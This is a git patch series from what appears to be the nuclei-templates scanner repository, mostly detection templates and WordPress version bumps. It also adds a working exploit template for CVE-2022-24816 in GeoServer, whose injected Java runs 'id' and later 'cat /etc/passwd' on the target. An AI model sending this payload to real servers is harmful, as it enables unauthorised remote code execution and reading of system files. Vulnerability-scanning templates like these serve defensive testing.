-technologies/wordpress/plugins/font-awesome.yaml -technologies/wordpress/plugins/force-regenerate-thumbnails.yaml -technologies/wordpress/plugins/formidable.yaml -technologies/wordpress/plugins/forminator.yaml -technologies/wordpress/plugins/ga-google-analytics.yaml -technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml -technologies/wordpress/plugins/google-analytics-for-wordpress.yaml -technologies/wordpress/plugins/google-listings-and-ads.yaml -technologies/wordpress/plugins/google-site-kit.yaml -technologies/wordpress/plugins/google-sitemap-generator.yaml -technologies/wordpress/plugins/gtranslate.yaml -technologies/wordpress/plugins/gutenberg.yaml -technologies/wordpress/plugins/happy-elementor-addons.yaml -technologies/wordpress/plugins/header-and-footer-scripts.yaml -technologies/wordpress/plugins/header-footer-code-manager.yaml -technologies/wordpress/plugins/header-footer-elementor.yaml -technologies/wordpress/plugins/header-footer.yaml -technologies/wordpress/plugins/health-check.yaml -technologies/wordpress/plugins/hello-dolly.yaml -technologies/wordpress/plugins/imagify.yaml -technologies/wordpress/plugins/imsanity.yaml -technologies/wordpress/plugins/insert-headers-and-footers.yaml -technologies/wordpress/plugins/instagram-feed.yaml -technologies/wordpress/plugins/intuitive-custom-post-order.yaml -technologies/wordpress/plugins/iwp-client.yaml -technologies/wordpress/plugins/jetpack.yaml -technologies/wordpress/plugins/kadence-blocks.yaml -technologies/wordpress/plugins/kirki.yaml -technologies/wordpress/plugins/leadin.yaml -technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml -technologies/wordpress/plugins/limit-login-attempts.yaml -technologies/wordpress/plugins/litespeed-cache.yaml -technologies/wordpress/plugins/loco-translate.yaml -technologies/wordpress/plugins/loginizer.yaml -technologies/wordpress/plugins/loginpress.yaml -technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml -technologies/wordpress/plugins/mailchimp-for-wp.yaml -technologies/wordpress/plugins/mailpoet.yaml -technologies/wordpress/plugins/maintenance.yaml -technologies/wordpress/plugins/mainwp-child.yaml -technologies/wordpress/plugins/malcare-security.yaml -technologies/wordpress/plugins/megamenu.yaml -technologies/wordpress/plugins/members.yaml -technologies/wordpress/plugins/meta-box.yaml -technologies/wordpress/plugins/ml-slider.yaml -technologies/wordpress/plugins/newsletter.yaml -technologies/wordpress/plugins/nextend-facebook-connect.yaml -technologies/wordpress/plugins/nextgen-gallery.yaml -technologies/wordpress/plugins/ninja-forms.yaml -technologies/wordpress/plugins/ocean-extra.yaml -technologies/wordpress/plugins/official-facebook-pixel.yaml -technologies/wordpress/plugins/one-click-demo-import.yaml -technologies/wordpress/plugins/optinmonster.yaml -technologies/wordpress/plugins/password-protected.yaml -technologies/wordpress/plugins/pdf-embedder.yaml -technologies/wordpress/plugins/photo-gallery.yaml -technologies/wordpress/plugins/php-compatibility-checker.yaml -technologies/wordpress/plugins/pixelyoursite.yaml -technologies/wordpress/plugins/polylang.yaml -technologies/wordpress/plugins/popup-builder.yaml -technologies/wordpress/plugins/popup-maker.yaml -technologies/wordpress/plugins/post-smtp.yaml -technologies/wordpress/plugins/post-types-order.yaml -technologies/wordpress/plugins/premium-addons-for-elementor.yaml -technologies/wordpress/plugins/pretty-link.yaml -technologies/wordpress/plugins/really-simple-captcha.yaml -technologies/wordpress/plugins/really-simple-ssl.yaml -technologies/wordpress/plugins/redirection.yaml -technologies/wordpress/plugins/redux-framework.yaml -technologies/wordpress/plugins/regenerate-thumbnails.yaml -technologies/wordpress/plugins/safe-svg.yaml -technologies/wordpress/plugins/seo-by-rank-math.yaml -technologies/wordpress/plugins/sg-cachepress.yaml -technologies/wordpress/plugins/sg-security.yaml -technologies/wordpress/plugins/shortcodes-ultimate.yaml -technologies/wordpress/plugins/shortpixel-image-optimiser.yaml -technologies/wordpress/plugins/simple-custom-post-order.yaml -technologies/wordpress/plugins/simple-page-ordering.yaml -technologies/wordpress/plugins/siteguard.yaml -technologies/wordpress/plugins/siteorigin-panels.yaml -technologies/wordpress/plugins/smart-slider-3.yaml -technologies/wordpress/plugins/so-widgets-bundle.yaml -technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml -technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml -technologies/wordpress/plugins/sucuri-scanner.yaml -technologies/wordpress/plugins/svg-support.yaml -technologies/wordpress/plugins/table-of-contents-plus.yaml -technologies/wordpress/plugins/tablepress.yaml -technologies/wordpress/plugins/taxonomy-terms-order.yaml -technologies/wordpress/plugins/the-events-calendar.yaml -technologies/wordpress/plugins/themeisle-companion.yaml -technologies/wordpress/plugins/tinymce-advanced.yaml -technologies/wordpress/plugins/translatepress-multilingual.yaml -technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml -technologies/wordpress/plugins/under-construction-page.yaml -technologies/wordpress/plugins/unyson.yaml -technologies/wordpress/plugins/updraftplus.yaml -technologies/wordpress/plugins/use-any-font.yaml -technologies/wordpress/plugins/user-role-editor.yaml -technologies/wordpress/plugins/velvet-blues-update-urls.yaml -technologies/wordpress/plugins/w3-total-cache.yaml -technologies/wordpress/plugins/webp-converter-for-media.yaml -technologies/wordpress/plugins/widget-importer-exporter.yaml -technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml -technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml -technologies/wordpress/plugins/woo-variation-swatches.yaml -technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml -technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml -technologies/wordpress/plugins/woocommerce-payments.yaml -technologies/wordpress/plugins/woocommerce-paypal-payments.yaml -technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml -technologies/wordpress/plugins/woocommerce-services.yaml -technologies/wordpress/plugins/woocommerce.yaml -technologies/wordpress/plugins/woosidebars.yaml -technologies/wordpress/plugins/wordfence.yaml -technologies/wordpress/plugins/wordpress-importer.yaml -technologies/wordpress/plugins/wordpress-seo.yaml -technologies/wordpress/plugins/worker.yaml -technologies/wordpress/plugins/wp-fastest-cache.yaml -technologies/wordpress/plugins/wp-file-manager.yaml -technologies/wordpress/plugins/wp-google-maps.yaml -technologies/wordpress/plugins/wp-mail-smtp.yaml -technologies/wordpress/plugins/wp-maintenance-mode.yaml -technologies/wordpress/plugins/wp-migrate-db.yaml -technologies/wordpress/plugins/wp-multibyte-patch.yaml -technologies/wordpress/plugins/wp-optimize.yaml -technologies/wordpress/plugins/wp-pagenavi.yaml -technologies/wordpress/plugins/wp-reset.yaml -technologies/wordpress/plugins/wp-sitemap-page.yaml -technologies/wordpress/plugins/wp-smushit.yaml -technologies/wordpress/plugins/wp-statistics.yaml -technologies/wordpress/plugins/wp-super-cache.yaml -technologies/wordpress/plugins/wp-user-avatar.yaml -technologies/wordpress/plugins/wpcf7-recaptcha.yaml -technologies/wordpress/plugins/wpcf7-redirect.yaml -technologies/wordpress/plugins/wpforms-lite.yaml -technologies/wordpress/plugins/wps-hide-login.yaml -technologies/wordpress/plugins/yith-woocommerce-compare.yaml -technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml -vulnerabilities/amazon/amazon-ec2-ssrf.yaml -vulnerabilities/other/digital-ocean-ssrf.yaml -vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml diff --git a/cves/2020/CVE-2020-35476.yaml b/cves/2020/CVE-2020-35476.yaml index 88c9505ec1..866fd32df3 100644 --- a/cves/2020/CVE-2020-35476.yaml +++ b/cves/2020/CVE-2020-35476.yaml @@ -4,10 +4,11 @@ info: name: OpenTSDB <= 2.4.0 - Remote Code Execution author: pikpikcu severity: critical - description: "OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory." + description: OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory. reference: - https://github.com/OpenTSDB/opentsdb/issues/2051 - https://nvd.nist.gov/vuln/detail/CVE-2020-35476 + - http://packetstormsecurity.com/files/170331/OpenTSDB-2.4.0-Command-Injection.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 diff --git a/cves/2022/CVE-2022-23854.yaml b/cves/2022/CVE-2022-23854.yaml index 15635ed27f..dd1f30bd82 100644 --- a/cves/2022/CVE-2022-23854.yaml +++ b/cves/2022/CVE-2022-23854.yaml @@ -10,11 +10,12 @@ info: - https://packetstormsecurity.com/files/cve/CVE-2022-23854 - https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23854 + - https://www.cisa.gov/uscert/ics/advisories/icsa-22-342-02 classification: cve-id: CVE-2022-23854 metadata: - verified: true shodan-query: http.html:"InTouch Access Anywhere" + verified: "true" tags: lfi,packetstorm,cve,cve2022,aveva,intouch requests: diff --git a/technologies/favicon-detect.yaml b/technologies/favicon-detect.yaml index 94826f00f1..67957402bd 100644 --- a/technologies/favicon-detect.yaml +++ b/technologies/favicon-detect.yaml @@ -2640,3 +2640,8 @@ requests: name: "Leica RefWorx" dsl: - "status_code==200 && (\"-1054477011\" == mmh3(base64_py(body)))" + + - type: dsl + name: "Liferay" + dsl: + - "status_code==200 && (\"-2024949122\" == mmh3(base64_py(body)))" From 7869328bc687fb362e500f731823bee3b4f0a197 Mon Sep 17 00:00:00 2001 From: nybble04 <36155956+nybble04@users.noreply.github.com> Date: Thu, 29 Dec 2022 19:01:56 +0400 Subject: [PATCH 0674/1133] Update matchers --- network/detection/pgsql-detect.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/network/detection/pgsql-detect.yaml b/network/detection/pgsql-detect.yaml index 9c67d50069..d2eb98c8db 100644 --- a/network/detection/pgsql-detect.yaml +++ b/network/detection/pgsql-detect.yaml @@ -9,6 +9,9 @@ info: metadata: verified: true shodan-query: port:5432 product:"PostgreSQL" + reference: + - https://www.postgresql.org/docs/current/errcodes-appendix.html + - https://www.postgresql.org/docs/current/client-authentication-problems.html tags: network,postgresql,db network: @@ -27,5 +30,9 @@ network: - type: word part: body words: - - "SCRAM-SHA-256" - - "Mpassword authentication failed for user" + - "28000" # Error code for invalid_authorization_specification + - "28P01" # Error code for invalid_password + - "SCRAM-SHA-256" # Authentication prompt + - "pg_hba.conf" # Client authentication config file + - "user \"nuclei\"" # The user nuclei (sent in request) doesn't exist + - "database \"nuclei\"" # The db nuclei (sent in request) doesn't exist From 1ab83c289ad2219803bc77a95941c6d5de217cf3 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Thu, 29 Dec 2022 12:37:59 -0500 Subject: [PATCH 0675/1133] Create watershed-panel.yaml --- exposed-panels/watershed-panel.yaml | 33 +++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 exposed-panels/watershed-panel.yaml diff --git a/exposed-panels/watershed-panel.yaml b/exposed-panels/watershed-panel.yaml new file mode 100644 index 0000000000..b3b72f75f8 --- /dev/null +++ b/exposed-panels/watershed-panel.yaml @@ -0,0 +1,33 @@ +id: watershed-panel + +info: + name: Watershed Panel Detect + author: tess + severity: info + metadata: + verified: true + shodan-query: http.title:"Watershed LRS" + tags: detect,panel,watershed + +requests: + - method: GET + path: + - '{{BaseURL}}/app/outside.html#/signin' + + matchers-condition: and + matchers: + - type: word + words: + - "Watershed LRS" + - "Watershed LRS doesn't support" + part: body + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 84e88fe2e9e50af197c5a7cc108a1d9c19a27580 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 30 Dec 2022 02:26:38 +0530 Subject: [PATCH 0676/1133] Update watershed-panel.yaml --- exposed-panels/watershed-panel.yaml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/exposed-panels/watershed-panel.yaml b/exposed-panels/watershed-panel.yaml index b3b72f75f8..c5ca7c014f 100644 --- a/exposed-panels/watershed-panel.yaml +++ b/exposed-panels/watershed-panel.yaml @@ -5,9 +5,9 @@ info: author: tess severity: info metadata: - verified: true - shodan-query: http.title:"Watershed LRS" - tags: detect,panel,watershed + verified: "true" + shodan-query: http.title:"Watershed LRS" + tags: panel,watershed requests: - method: GET @@ -17,11 +17,9 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "Watershed LRS" - - "Watershed LRS doesn't support" - part: body - condition: and - type: word part: header From f08b47669a9d877f63224da9757b06fe6623e831 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 30 Dec 2022 02:31:42 +0530 Subject: [PATCH 0677/1133] minor-changes --- ...ationmanager.yaml => manageengine-network-config.yaml} | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) rename exposed-panels/zoho/{manageengine-networkconfigurationmanager.yaml => manageengine-network-config.yaml} (73%) diff --git a/exposed-panels/zoho/manageengine-networkconfigurationmanager.yaml b/exposed-panels/zoho/manageengine-network-config.yaml similarity index 73% rename from exposed-panels/zoho/manageengine-networkconfigurationmanager.yaml rename to exposed-panels/zoho/manageengine-network-config.yaml index b452acec49..3b64d18645 100644 --- a/exposed-panels/zoho/manageengine-networkconfigurationmanager.yaml +++ b/exposed-panels/zoho/manageengine-network-config.yaml @@ -1,11 +1,11 @@ -id: manageengine-networkconfigurationmanager +id: manageengine-network-config info: - name: ZOHO ManageEngine Network Configuration Manager + name: Zoho Manage Engine Network Configuration Manager author: righettod severity: info metadata: - verified: true + verified: "true" shodan-query: http.title:"Network Configuration Manager" tags: panel,zoho,manageengine @@ -20,7 +20,7 @@ requests: part: body words: - 'Network Configuration Manager' - - '"https://www.manageengine.com' + - 'https://www.manageengine.com' condition: and - type: status From 74aeb989d7c845c747d437baa76a3d9c833bf284 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 30 Dec 2022 04:02:37 +0000 Subject: [PATCH 0678/1133] Auto WordPress Plugins Update [Fri Dec 30 04:02:37 UTC 2022] :robot: --- helpers/wordpress/plugins/gutenberg.txt | 2 +- helpers/wordpress/plugins/siteorigin-panels.txt | 2 +- helpers/wordpress/plugins/yith-woocommerce-compare.txt | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index 86417cf417..5678d9d16e 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -14.8.3 \ No newline at end of file +14.8.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/siteorigin-panels.txt b/helpers/wordpress/plugins/siteorigin-panels.txt index 0352eb1709..29e5a3bd47 100644 --- a/helpers/wordpress/plugins/siteorigin-panels.txt +++ b/helpers/wordpress/plugins/siteorigin-panels.txt @@ -1 +1 @@ -2.20.1 \ No newline at end of file +2.20.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/yith-woocommerce-compare.txt b/helpers/wordpress/plugins/yith-woocommerce-compare.txt index 971e119ac7..f1270b4e4e 100644 --- a/helpers/wordpress/plugins/yith-woocommerce-compare.txt +++ b/helpers/wordpress/plugins/yith-woocommerce-compare.txt @@ -1 +1 @@ -2.21.0 \ No newline at end of file +2.22.0 \ No newline at end of file From ad6a5c73f001b177238fb3b11af62faf9f362200 Mon Sep 17 00:00:00 2001 From: Mukund Date: Fri, 30 Dec 2022 13:57:33 +0530 Subject: [PATCH 0679/1133] Added CVE-2022-24816 --- cves/2022/CVE-2022-24816.yaml | 70 +++++++++++++++++++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 cves/2022/CVE-2022-24816.yaml diff --git a/cves/2022/CVE-2022-24816.yaml b/cves/2022/CVE-2022-24816.yaml new file mode 100644 index 0000000000..5d10c87ea6 --- /dev/null +++ b/cves/2022/CVE-2022-24816.yaml @@ -0,0 +1,70 @@ +id: CVE-2022-24816 + +info: + name: Geoserver Server - Code Injection + author: mukundbhuva + severity: critical + description: Programs using jt-jiffle, and allowing Jiffle script to be provided via network request, are susceptible to a Remote Code Execution as the Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects the downstream GeoServer project Version < 1.1.22. + reference: + - http://geoserver.org/ + - https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-24816 + cwe-id: CWE-94 + metadata: + fofa-query: app="GeoServer" + tags: geoserver,cve,cve2022,rce + +requests: + - raw: + - | + POST /geoserver/wms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + + + ras:Jiffle + + + coverage + + + + + + script + + dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("id").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /** + + + + outputType + + DOUBLE + + + + + + result + + + + + + attack: pitchfork + + matchers: + - type: word + part: body + words: + - "ExceptionInInitializerError" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/28 From 50836a96f3b6af6bc02de60b442122b72b5ff16e Mon Sep 17 00:00:00 2001 From: mukundbhuva <40537082+mukundbhuva@users.noreply.github.com> Date: Fri, 30 Dec 2022 08:44:38 +0000 Subject: [PATCH 0680/1133] Update CVE-2022-24816.yaml change Content-Type to xml --- cves/2022/CVE-2022-24816.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-24816.yaml b/cves/2022/CVE-2022-24816.yaml index 5d10c87ea6..fbe81670b1 100644 --- a/cves/2022/CVE-2022-24816.yaml +++ b/cves/2022/CVE-2022-24816.yaml @@ -22,7 +22,7 @@ requests: - | POST /geoserver/wms HTTP/1.1 Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded + Content-Type: application/xml From 53e93649ff7f2905b31ca743161995810d14cd82 Mon Sep 17 00:00:00 2001 From: Mukund Date: Fri, 30 Dec 2022 14:35:28 +0530 Subject: [PATCH 0681/1133] Update CVE-2022-24816 : add filters for false positive --- cves/2022/CVE-2022-24816.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2022/CVE-2022-24816.yaml b/cves/2022/CVE-2022-24816.yaml index fbe81670b1..5315af8498 100644 --- a/cves/2022/CVE-2022-24816.yaml +++ b/cves/2022/CVE-2022-24816.yaml @@ -57,11 +57,15 @@ requests: attack: pitchfork + matchers-condition: and matchers: - type: word part: body words: - "ExceptionInInitializerError" + - "uid" + + condition: and - type: status status: From ed7f45fd03b757a458e25b53b00893c0efa1c3ac Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 30 Dec 2022 15:43:22 +0530 Subject: [PATCH 0682/1133] condition -updated --- network/detection/pgsql-detect.yaml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/network/detection/pgsql-detect.yaml b/network/detection/pgsql-detect.yaml index d2eb98c8db..3de2bc5dbc 100644 --- a/network/detection/pgsql-detect.yaml +++ b/network/detection/pgsql-detect.yaml @@ -30,9 +30,10 @@ network: - type: word part: body words: - - "28000" # Error code for invalid_authorization_specification - - "28P01" # Error code for invalid_password - - "SCRAM-SHA-256" # Authentication prompt - - "pg_hba.conf" # Client authentication config file - - "user \"nuclei\"" # The user nuclei (sent in request) doesn't exist - - "database \"nuclei\"" # The db nuclei (sent in request) doesn't exist + - "28000" + - "28P01" + - "SCRAM-SHA-256" + - "pg_hba.conf" + - "user \"nuclei\"" + - "database \"nuclei\"" + condition: or From 1db046d4bd3689b524398c13bab32ffc627738aa Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 30 Dec 2022 15:51:06 +0530 Subject: [PATCH 0683/1133] matchers comments added --- network/detection/pgsql-detect.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/network/detection/pgsql-detect.yaml b/network/detection/pgsql-detect.yaml index 3de2bc5dbc..6b4ea19033 100644 --- a/network/detection/pgsql-detect.yaml +++ b/network/detection/pgsql-detect.yaml @@ -30,10 +30,10 @@ network: - type: word part: body words: - - "28000" - - "28P01" - - "SCRAM-SHA-256" - - "pg_hba.conf" - - "user \"nuclei\"" - - "database \"nuclei\"" + - "28000" # Error code for invalid_authorization_specification + - "28P01" # Error code for invalid_password + - "SCRAM-SHA-256" # Authentication prompt + - "pg_hba.conf" # Client authentication config file + - "user \"nuclei\"" # The user nuclei (sent in request) doesn't exist + - "database \"nuclei\"" # The db nuclei (sent in request) doesn't exist" condition: or From 5b558375c2bc4972a9bfc8b04a2df820763935fa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 31 Dec 2022 04:02:13 +0000 Subject: [PATCH 0684/1133] Auto WordPress Plugins Update [Sat Dec 31 04:02:13 UTC 2022] :robot: --- helpers/wordpress/plugins/woocommerce-payments.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index 7cbea073be..804440660c 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -5.2.0 \ No newline at end of file +5.2.1 \ No newline at end of file From 184581ba975d7a5702ca4ea758d597b8b16a9a29 Mon Sep 17 00:00:00 2001 From: Pugalarasan <75373225+0xPugazh@users.noreply.github.com> Date: Sat, 31 Dec 2022 14:21:30 +0530 Subject: [PATCH 0685/1133] Create api-zerbounce.yaml --- token-spray/api-zerbounce.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 token-spray/api-zerbounce.yaml diff --git a/token-spray/api-zerbounce.yaml b/token-spray/api-zerbounce.yaml new file mode 100644 index 0000000000..3054d818da --- /dev/null +++ b/token-spray/api-zerbounce.yaml @@ -0,0 +1,23 @@ +id: api-zerobounce + +info: + name: Zerobounce API Test + author: 0xlittleboy + severity: info + reference: + - https://www.zerobounce.net/docs/email-validation-api-quickstart + tags: token-spray,zerobounce + +self-contained: true +requests: + - method: GET + path: + - "https://api.zerobounce.net/v2/getapiusage?api_key={{token}}&start_date=2018-01-01&end_date=2019-12-12" + matchers: + - type: word + part: body + words: + - '"total"' + - '"status"' + - '"date"' + condition: and From 5cec4ff5934e0ea8274950ea9d08b545daa27c90 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 31 Dec 2022 15:16:02 +0530 Subject: [PATCH 0686/1133] Update CVE-2022-24816.yaml --- cves/2022/CVE-2022-24816.yaml | 27 ++++++++++----------------- 1 file changed, 10 insertions(+), 17 deletions(-) diff --git a/cves/2022/CVE-2022-24816.yaml b/cves/2022/CVE-2022-24816.yaml index 5315af8498..966a8fb3da 100644 --- a/cves/2022/CVE-2022-24816.yaml +++ b/cves/2022/CVE-2022-24816.yaml @@ -4,18 +4,17 @@ info: name: Geoserver Server - Code Injection author: mukundbhuva severity: critical - description: Programs using jt-jiffle, and allowing Jiffle script to be provided via network request, are susceptible to a Remote Code Execution as the Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects the downstream GeoServer project Version < 1.1.22. + description: | + Programs using jt-jiffle, and allowing Jiffle script to be provided via network request, are susceptible to a Remote Code Execution as the Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects the downstream GeoServer project Version < 1.1.22. reference: - - http://geoserver.org/ - https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-24816 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2022-24816 - cwe-id: CWE-94 metadata: + shodan-query: /geoserver/ fofa-query: app="GeoServer" - tags: geoserver,cve,cve2022,rce + tags: cve,cve2022,geoserver,rce requests: - raw: @@ -37,7 +36,7 @@ requests: script - dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("id").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /** + dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cat /etc/passwd").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /** @@ -54,21 +53,15 @@ requests: - - attack: pitchfork - matchers-condition: and matchers: - - type: word + - type: regex part: body - words: - - "ExceptionInInitializerError" - - "uid" - + regex: + - "root:.*:0:0:" + - "ExceptionInInitializerError" condition: and - type: status status: - 200 - -# Enhanced by mp on 2022/03/28 From e8312b20feff9cfdf1dc8da0455c2e20f39e2aa1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 31 Dec 2022 15:17:39 +0530 Subject: [PATCH 0687/1133] Update CVE-2022-24816.yaml --- cves/2022/CVE-2022-24816.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2022/CVE-2022-24816.yaml b/cves/2022/CVE-2022-24816.yaml index 966a8fb3da..27be14425f 100644 --- a/cves/2022/CVE-2022-24816.yaml +++ b/cves/2022/CVE-2022-24816.yaml @@ -12,6 +12,7 @@ info: classification: cve-id: CVE-2022-24816 metadata: + verified: true shodan-query: /geoserver/ fofa-query: app="GeoServer" tags: cve,cve2022,geoserver,rce From a0c973d3aa82ed2c153495a38c693c2e0690178d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 31 Dec 2022 15:21:45 +0530 Subject: [PATCH 0688/1133] Update CVE-2022-24816.yaml --- cves/2022/CVE-2022-24816.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-24816.yaml b/cves/2022/CVE-2022-24816.yaml index 27be14425f..800b7fc91d 100644 --- a/cves/2022/CVE-2022-24816.yaml +++ b/cves/2022/CVE-2022-24816.yaml @@ -54,15 +54,15 @@ requests: - matchers-condition: and + matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - - "ExceptionInInitializerError" + - "ExceptionInInitializerError" condition: and - + - type: status status: - 200 From e08e465d0092e1c71f22b53cc0edcc35e3778a0c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 1 Jan 2023 04:02:30 +0000 Subject: [PATCH 0689/1133] Auto WordPress Plugins Update [Sun Jan 1 04:02:30 UTC 2023] :robot: --- helpers/wordpress/plugins/shortpixel-image-optimiser.txt | 2 +- helpers/wordpress/plugins/wp-user-avatar.txt | 2 +- technologies/wordpress/plugins/shortpixel-image-optimiser.yaml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/helpers/wordpress/plugins/shortpixel-image-optimiser.txt b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt index ed95ef7767..7a3e417feb 100644 --- a/helpers/wordpress/plugins/shortpixel-image-optimiser.txt +++ b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt @@ -1 +1 @@ -5.1.5 \ No newline at end of file +5.1.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-user-avatar.txt b/helpers/wordpress/plugins/wp-user-avatar.txt index 99523d4768..689f7fbd33 100644 --- a/helpers/wordpress/plugins/wp-user-avatar.txt +++ b/helpers/wordpress/plugins/wp-user-avatar.txt @@ -1 +1 @@ -4.5.1 \ No newline at end of file +4.5.2 \ No newline at end of file diff --git a/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 9a97dcbb3e..b6d5385b44 100644 --- a/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -1,7 +1,7 @@ id: wordpress-shortpixel-image-optimiser info: - name: ShortPixel Image Optimizer Detection + name: ShortPixel Image Optimizer – Optimize Images, Convert WebP & AVIF Detection author: ricardomaia severity: info reference: From aefe9b21032b05f8cd93538ffdbc1b7bed3b67d8 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 1 Jan 2023 16:27:01 +0530 Subject: [PATCH 0690/1133] Added akamai cdn detection template --- technologies/akamai-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/akamai-detect.yaml diff --git a/technologies/akamai-detect.yaml b/technologies/akamai-detect.yaml new file mode 100644 index 0000000000..01de7b67b8 --- /dev/null +++ b/technologies/akamai-detect.yaml @@ -0,0 +1,24 @@ +id: akamai-detect + +info: + name: akamai cdn detection + author: pdteam + severity: info + reference: + - https://support.globaldots.com/hc/en-us/articles/115003996705-Akamai-Pragma-Headers-overview + - https://community.akamai.com/customers/s/article/Using-Akamai-Pragma-headers-to-investigate-or-troubleshoot-Akamai-content-delivery?language=en_US + tags: akamai,cdn,tech + + +requests: + - method: GET + path: + - "{{BaseURL}}" + headers: + Pragma: akamai-x-cache-on + + matchers: + - type: word + part: 